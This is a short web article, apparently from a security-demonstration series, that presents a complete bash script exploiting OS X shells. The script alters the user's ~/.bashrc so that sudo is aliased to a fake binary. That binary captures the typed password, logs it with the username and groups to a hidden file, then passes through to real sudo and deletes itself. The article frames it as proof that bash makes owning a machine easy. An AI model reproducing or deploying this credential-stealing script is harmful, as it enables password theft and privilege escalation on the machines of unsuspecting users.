Home » Learning Curve
Way Too Much Sudo FunBashing bash again because it's so much fun and above all so easy.
As demonstrated in 'Sudo Fun' it's possible to hijack use of the Unix sudo to obtain less than optimal results. OS X boxes can namely be compromised in a number of ways.
As demonstrated in 'Too Much Sudo Fun' it's possible to humiliate bash without risking the maintainers do anything about it. ~/.bash_profile is used to accomplish this.
But it turns out even ~/.bashrc can be made into a turkey. And that's demonstrated here and now.
#! /bin/bash
userhome="/Users/`whoami`"
fakesudo="/Users/Shared/sudo"
logfile="/Users/Shared/.keylog"
target="$userhome/.bashrc"
if [ -f $target ]; then
if [ ! -w $target ]; then
chmod a+w $target 2>/dev/null || exit 1
fi
else
touch $target 2>/dev/null || exit 1
fi
grep -sq sudo $target || cat <<EOF >>$target
if [ -x $fakesudo ]; then
alias sudo="$fakesudo"
fi
EOF
if [ -f "$fakesudo" ]; then
rm -f "$fakesudo" 2>/dev/null
fi
touch "$fakesudo"
chmod a+x "$fakesudo"
echo '#! /bin/bash'>>"$fakesudo"
echo '#'>>"$fakesudo"
echo 'inp=""'>>"$fakesudo"
echo 'stty -echo'>>"$fakesudo"
echo 'read -p "Password:" inp'>>"$fakesudo"
echo 'stty echo'>>"$fakesudo"
echo 'echo'>>"$fakesudo"
echo 'logfile="/Users/Shared/.keylog" '>>"$fakesudo"
echo 'echo "$inp">>"$logfile"'>>"$fakesudo"
echo 'echo `whoami`>>"$logfile" '>>"$fakesudo"
echo 'echo `groups`>>"$logfile" '>>"$fakesudo"
echo 'echo "Sorry, try again."'>>"$fakesudo"
echo '/usr/bin/sudo "$@"'>>"$fakesudo"
echo 'rm -f "/Users/Shared/sudo"'>>"$fakesudo"
echo 'bash ' >> $fakesudo
echo 'exit 0'>>"$fakesudo"
bash
exit 0
There are a few caveats with this exploit but it does prove a point. Namely that it's all too easy - not with OS X but with bash - to own a machine.
See Also Sudo Fun ACP Services Resolve Path Too Much Sudo Fun
Thanks again to GC at the CLIX Exchange for pulling another all nighter.
|